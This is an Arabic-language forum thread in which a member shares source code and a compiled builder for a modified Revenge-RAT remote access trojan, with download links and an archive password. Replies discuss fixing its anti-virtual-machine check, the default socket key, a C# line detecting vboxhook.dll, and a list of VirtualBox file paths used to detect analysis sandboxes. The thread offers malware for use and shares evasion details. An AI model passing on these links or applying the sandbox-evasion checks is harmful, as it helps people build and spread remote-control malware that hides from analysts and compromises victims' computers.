[ سورس ] RevengeRAT v0.3 | LimeBuilder

• (واستعينوا بالصبر والصلاة وإنها لكبيرة إلا على الخاشعين)
    لاتضيع صلاتك .. تعتبر الصلاة الركن الثاني من أركان الاسلام، حيث لا يصحّ إسلام مسلمٍ إلا بها

• (وماكان الله معذبهم وهم يستغفرون) ..الاستغفار هو السبيل الأقرب لنيل رضى الله عز وجل
    اللهم أنت ربي لا إله إلى أنت خلقتني وأنا عبدك، وأنا على عهدك ووعدك ما استطعت، أعوذ بك من شر ما صنعت، أبوء لك بنعمتك علي، وأبوء بذنبي فاغفر لي فإنّه لا يغفر الذنوب إلّا أنت

NYAN CAT

.:: VIP ::.
8 يناير 2019
76
251
Kuwait
github.com
0

السلام عليكـم

أنزلت في الأمس سورس مساعد لبناء عميل لأي برنامج رات. المشروع يستهدف المبتدئين لمعرفة كيفية قيام بعض المهام للعميل مثل التثبيت وإيجاد ID مميز وتجنب فحص النظام الوهمي وأيضاً بعض الخواص الأخرى.
رابط المساعد

فأحببت أن أطبق الكود بشكل عملي فكتبت مشروع Builder وإخترت Revenge-RAT لأنه برنامج ممتاز ولايزال الكثيرين يستعملونه وأيضاً لأنه لايوجد له Builder معدل لحد الآن.
والجدير بالذكر بأن سورس كود العميل تم التعديل عليه ليكون ثابت في الإتصال وهي المشكلة التي كان يعاني منها كل مستخدمين ريفينج-رات. فتستطيع أن تقول بأنه هذا العميل نسخه مصححة.

باسورد=nyancat

أترك لكم حرية التعديل عليه وإضافة الكثير من الخواص الأخرى.
دمتم بخير وصحة.

التعديل الأخير:

NYAN CAT

8 يناير 2019
76
251
Kuwait
github.com
0
  • أعجبني
التفاعلات: unknown2 و BasharBachir

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,169
2,054
1
ماشاء الله عليك ..افادة كبيرة جدا للي حابب انه يتعلم ..اتمنى من كل قلبي ان يرى بعض الاعضاء كيفية تطبيقك ويتعلمو
لا ان ياخذو المشروع الحالي كما هو ..
الله يعطيك الف عافية اخي الحبيب على تعبك ..اتمنى لك كل خير اخي الغالي نيان

• أعجبني
التفاعلات: NYAN CAT

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,169
2,054
1
عند تفعيل Anti Virtua Machines لايعمل الناتج على ويندوز ليس بوهمي "الويندوز اللي بشتغل عليه" ماادري ب ايش يشتبه عندي حتى عميغلق نفسه مفكر انني بالوهمي ..
ايضا من الممكن اعلم تغيير مفتاح السوكيت ولكن دام انت وضعت الافتراضي الخاص بالريفينج رات فهو يجب ان يكون Revenge-Rat وليس Revenge-RAT من الممكن تغييره من المستخدم اعرف بالطبع ولكن الافضل وضعه بشكل صحيح اخي الحبيب نيان لربما فاتك المفتاح الصحيح للريفينج ..او انا نسيان والنسخة اللي عندي مفتاحها Revenge-Rat "اخر حرفين سمول"
مشكلة الانتي في ام وير ماشين مشكلة لان بهالحالة مارح يشتغل الكلاينت على كثير من الاجهزة اللي هيه مش وهمية
للعلم حملت النسخة الRelease اللي انت عامل لها كمبايل اخي وعليها باس

• أعجبني

Dr.kader

Legend Administrator
Legend Administrator
21 يناير 2019
10,125
212
الجزائر
0

السلام عليكـم

أنزلت في الأمس سورس مساعد لبناء عميل لأي برنامج رات. المشروع يستهدف المبتدئين لمعرفة كيفية قيام بعض المهام للعميل مثل التثبيت وإيجاد ID مميز وتجنب فحص النظام الوهمي وأيضاً بعض الخواص الأخرى.
رابط المساعد

فأحببت أن أطبق الكود بشكل عملي فكتبت مشروع Builder وإخترت Revenge-RAT لأنه برنامج ممتاز ولايزال الكثيرين يستعملونه وأيضاً لأنه لايوجد له Builder معدل لحد الآن.
والجدير بالذكر بأن سورس كود العميل تم التعديل عليه ليكون ثابت في الإتصال وهي المشكلة التي كان يعاني منها كل مستخدمين ريفينج-رات. فتستطيع أن تقول بأنه هذا العميل نسخه مصححة.

https://protection-tips.com/rapidleech/files/Rev-Builder-SRC.zip
باسورد=nyancat
#تحديث: تم حل مشكلة عدم الاتصال بالهوست الإحتياطي
https://www.mediafire.com/file/2xn4b0p24rzuoc6/Rev-Builder-SRC.zip/file

https://protection-tips.com/rapidleech/files/Rev-LimeBuilder.zip
باسورد=nyancat
#تحديث: تم حل مشكلة عدم الاتصال بالهوست الإحتياطي
https://www.mediafire.com/file/2f96daywww2n9nc/Rev-Builder.zip/file

أترك لكم حرية التعديل عليه وإضافة الكثير من الخواص الأخرى.
دمتم بخير وصحة.
وحش يعطيك الصحة اخي
هذه هي الشروحات التي احبها

• أعجبني

NYAN CAT

8 يناير 2019
76
251
Kuwait
github.com
0
عند تفعيل Anti Virtua Machines لايعمل الناتج على ويندوز ليس بوهمي "الويندوز اللي بشتغل عليه" ماادري ب ايش يشتبه عندي حتى عميغلق نفسه مفكر انني بالوهمي ..
ايضا من الممكن اعلم تغيير مفتاح السوكيت ولكن دام انت وضعت الافتراضي الخاص بالريفينج رات فهو يجب ان يكون Revenge-Rat وليس Revenge-RAT من الممكن تغييره من المستخدم اعرف بالطبع ولكن الافضل وضعه بشكل صحيح اخي الحبيب نيان لربما فاتك المفتاح الصحيح للريفينج ..او انا نسيان والنسخة اللي عندي مفتاحها Revenge-Rat "اخر حرفين سمول"
مشكلة الانتي في ام وير ماشين مشكلة لان بهالحالة مارح يشتغل الكلاينت على كثير من الاجهزة اللي هيه مش وهمية
للعلم حملت النسخة الRelease اللي انت عامل لها كمبايل اخي وعليها باس
المشكلة أن الموضوع قديم ولم يبلغ أحد إلا أنت فشكراً لك على ردك يامبدع :l6:.
تم تصحيح + الغاء رابط Compiled version لكي يقرأ العضو الكود بشكل سريع قبل التشغيل.

• أعجبني
التفاعلات: BasharBachir

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,169
2,054
1
المشكلة أن الموضوع قديم ولم يبلغ أحد إلا أنت فشكراً لك على ردك يامبدع :l6:.
تم تصحيح + الغاء رابط Compiled version لكي يقرأ العضو الكود بشكل سريع قبل التشغيل.
لامبدع ولاشيء وصراحة ماقرات السورس لانه vb.net "اكرهه" ..
عشان الكلاينت عشان يتحقق ان كان شغال ب vitruabox

C#:
        else if (File.Exists(Environment.GetEnvironmentVariable("windir") + "\\vboxhook.dll"))
لاحظت انه ماعندي هذا الملف اخي انت جربت وكان عندك ؟
صراحة كنت حابب استند على ادتك لانني صنعت ترياق لكافة الAnti VM اللي بالسوق :15:
ماادري صراحة ان احد عمل هيك شي قبل ..ان تعرف ان احد سوى هالشي اخبرني عشان مااكمل :]d (1):
بس الاداة لم تفدني حتى الان ..اقدر ادور فيه مقاالات بيذكرو المكتبات الثابتة في virtuabox بس حبيت اقول لك اخي انه الملف vboxhook.dll مش موجود بكل النظام عندي مش بس انه مش موجود ب Windows Directory
حابب يكون فيه اداة تعمل واتخطاها عشان الفديو ..مش انو انا اسوي اداة ..الان بدور عن ادوات ثانية ..تبا لك يانيان ماخليت الفرحة تكمل :ssse::th_2mo5pow:

• أعجبني
التفاعلات: NYAN CAT و ๖ۣۜA M E E R

NYAN CAT

8 يناير 2019
76
251
Kuwait
github.com
0
لامبدع ولاشيء وصراحة ماقرات السورس لانه vb.net "اكرهه" ..
عشان الكلاينت عشان يتحقق ان كان شغال ب vitruabox

C#:
        else if (File.Exists(Environment.GetEnvironmentVariable("windir") + "\\vboxhook.dll"))
لاحظت انه ماعندي هذا الملف اخي انت جربت وكان عندك ؟
صراحة كنت حابب استند على ادتك لانني صنعت ترياق لكافة الAnti VM اللي بالسوق :15:
ماادري صراحة ان احد عمل هيك شي قبل ..ان تعرف ان احد سوى هالشي اخبرني عشان مااكمل :]d (1):
بس الاداة لم تفدني حتى الان ..اقدر ادور فيه مقاالات بيذكرو المكتبات الثابتة في virtuabox بس حبيت اقول لك اخي انه الملف vboxhook.dll مش موجود بكل النظام عندي مش بس انه مش موجود ب Windows Directory
حابب يكون فيه اداة تعمل واتخطاها عشان الفديو ..مش انو انا اسوي اداة ..الان بدور عن ادوات ثانية ..تبا لك يانيان ماخليت الفرحة تكمل :ssse::th_2mo5pow:
مع انه vb وc# متشابهين ولكن تبقى اختلاف اذواق. بس لم اجرب virtual box ولما ثبته على جهازي حسيت ببطئ رهيب في الاستجابه ومسحته للابد. اما VMware تم التجربة عليه.
بخصوص الترياق الخاص فيك فممكن تجربته على VMware او ابحث في جوحل عن مقالات متخصصه في تخطي الوهمي.
بس ماكنت اعرف انه طريقتي لل virtual box غير فعالة :2 (2): ام ممكن outdated

• أعجبني

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,169
2,054
1
مع انه vb وc# متشابهين ولكن تبقى اختلاف اذواق. بس لم اجرب virtual box ولما ثبته على جهازي حسيت ببطئ رهيب في الاستجابه ومسحته للابد. اما VMware تم التجربة عليه.
بخصوص الترياق الخاص فيك فممكن تجربته على VMware او ابحث في جوحل عن مقالات متخصصه في تخطي الوهمي.
بس ماكنت اعرف انه طريقتي لل virtual box غير فعالة :2 (2): ام ممكن outdated
اعتقد اكثر من اختلاف اذواق فيه اختلافات ماتمشي مع عقلي بال vb.net المهم ماعلينا خخ
عشان الفيرتشوا بوكس الاصدار عندي حديث فيه امكانية انهم غيرو اسماء المكتبات او استغنوا عن بعضها ماادري صراحة
ونعم اخي اقدر ابحث عشان الفيرتشوا بوكس او الفي ام وير وركستيشن مش مشكلة عندي
بس مثل ماقلت لك حبيت يكون فيه اداة جاهزة واتخطاها هذا كل شيء ..
ببحث ب جيت هاب ان مالقيت بعمل انا اداة ..بس الفكرة مش حلوة انك تبرمج اداة وانت تتخطاها .."بتكون مثل شهادة واحد بنفسه خخخ"..
بالنسبة للترياق يعمل على vmware ورح يعمل على فيرتشوا بوكس ماعندي شك لان اللي سويته انني منعت الوصول للملفات هذه او لمسار الريجيستري المحدد ..هذا كل شيء

• أعجبني

NYAN CAT

8 يناير 2019
76
251
Kuwait
github.com
0
اعتقد اكثر من اختلاف اذواق فيه اختلافات ماتمشي مع عقلي بال vb.net المهم ماعلينا خخ
عشان الفيرتشوا بوكس الاصدار عندي حديث فيه امكانية انهم غيرو اسماء المكتبات او استغنوا عن بعضها ماادري صراحة
ونعم اخي اقدر ابحث عشان الفيرتشوا بوكس او الفي ام وير وركستيشن مش مشكلة عندي
بس مثل ماقلت لك حبيت يكون فيه اداة جاهزة واتخطاها هذا كل شيء ..
ببحث ب جيت هاب ان مالقيت بعمل انا اداة ..بس الفكرة مش حلوة انك تبرمج اداة وانت تتخطاها .."بتكون مثل شهادة واحد بنفسه خخخ"..
بالنسبة للترياق يعمل على vmware ورح يعمل على فيرتشوا بوكس ماعندي شك لان اللي سويته انني منعت الوصول للملفات هذه او لمسار الريجيستري المحدد ..هذا كل شيء
سأحاول اليوم لو امكن أن اغير شرط virtual box ليشمل النسخ القديمة والحديثة. اصابني فضول لمشاهدة طريقتك للتخطي :19: ان شاء الله نرى لها موضوع عما قريب.

• أعجبني

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,169
2,054
1
سأحاول اليوم لو امكن أن اغير شرط virtual box ليشمل النسخ القديمة والحديثة. اصابني فضول لمشاهدة طريقتك للتخطي :19: ان شاء الله نرى لها موضوع عما قريب.
موجود ضمن مواضيعي اخذت السورس وقتها من سورس Nu3llCrypter لراكان

• أعجبني

NYAN CAT

8 يناير 2019
76
251
Kuwait
github.com
0
موجود ضمن مواضيعي اخذت السورس وقتها من سورس Nu3llCrypter لراكان
لدي سؤال سيوفر علي الوقت في تثبيت VBox ، من بعد اذنك هل لديك هذا الملف في هذا المسار system32\vboxservice.exe ؟

أو واحد من هؤلاء :
C:\windows\System32\Drivers\VBoxMouse.sys

C:\windows\System32\Drivers\VBoxGuest.sys

C:\windows\System32\Drivers\VBoxSF.sys

C:\windows\System32\Drivers\VBoxVideo.sys

C:\windows\System32\vboxdisp.dll

C:\windows\System32\vboxhook.dll

C:\windows\System32\vboxmrxnp.dll

C:\windows\System32\vboxogl.dll

C:\windows\System32\vboxoglarrayspu.dll

C:\windows\System32\vboxoglcrutil.dll

C:\windows\System32\vboxoglerrorspu.dll

C:\windows\System32\vboxoglfeedbackspu.dll

C:\windows\System32\vboxoglpackspu.dll

C:\windows\System32\vboxoglpassthroughspu.dll

C:\windows\System32\vboxservice.exe

C:\windows\System32\vboxtray.exe

C:\windows\System32\VBoxControl.exe

• أعجبني

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,169
2,054
1
لدي سؤال سيوفر علي الوقت في تثبيت VBox ، من بعد اذنك هل لديك هذا الملف في هذا المسار system32\vboxservice.exe ؟

أو واحد من هؤلاء :

اسف منك اخي اخي الحبيب نيان الان فقط رايت ردك
ان شاء الله ماتكون تغلبت وثبته
جاري البحث اخي

• أعجبني

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,169
2,054
1

أو واحد من هؤلاء :

لايوجد اي ملف منهم ..واعتقد ان تجربتي هي السبب
انا لم اقم بتثبيت مايطلب عادة الفيرتشوا بوكس تثبيته لان شكيت انه وقت التثبيت الاولي للويندوز لايقوم الفيرتشوا بوكس فعل اي شيء لانسخ تعريفات ولااي شيء اخر مما يؤدي لعدم وجود ملف مميز من الممكن استغلاله
الملفات اللي بيثبتها الفيرتشوا بوكس ..عشان تفعيل الكليبورد بين الهوست والجيست وعشان ايضا التعريفات اعتقد وامور ثانية ..
ان كان ماافكر به صحيح فلدينا بالفعل ترياق بدون اي اداة وهو عدم تثبيت مايطلب الفيرتشوا بوكس منا تثبيت ..ومارح يكون هنالك ملف مميز موجود بنسخة الويندوز ..
عشان انتقال الملفات من والى الوهمي بالامكان تشغيل الاباتشي وتناقل الملفات مثل ماانا عامل ..

• أعجبني

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,169
2,054
1
لا بالعكس أخذ راحتك يوم أو يومين مش مستعجل أبداً ، أصلاً كنت مشغول وللتو دخلت البيت
حمدا لله على سلامتك اخي الحبيب ..كتبت لك ماوجدته ..ان شاء لله نوصل لمفهوم ثابت نمشي عليه
ان كان الحل في عدم تثبيت الادوات او الملف اللي بيطلب منا الفيرتشوال بوكس تثبيته ف هالالويا :ssse:
نقل الملفات عبر الاباتشي وانتهينا من هالقصة :yaho:

• أعجبني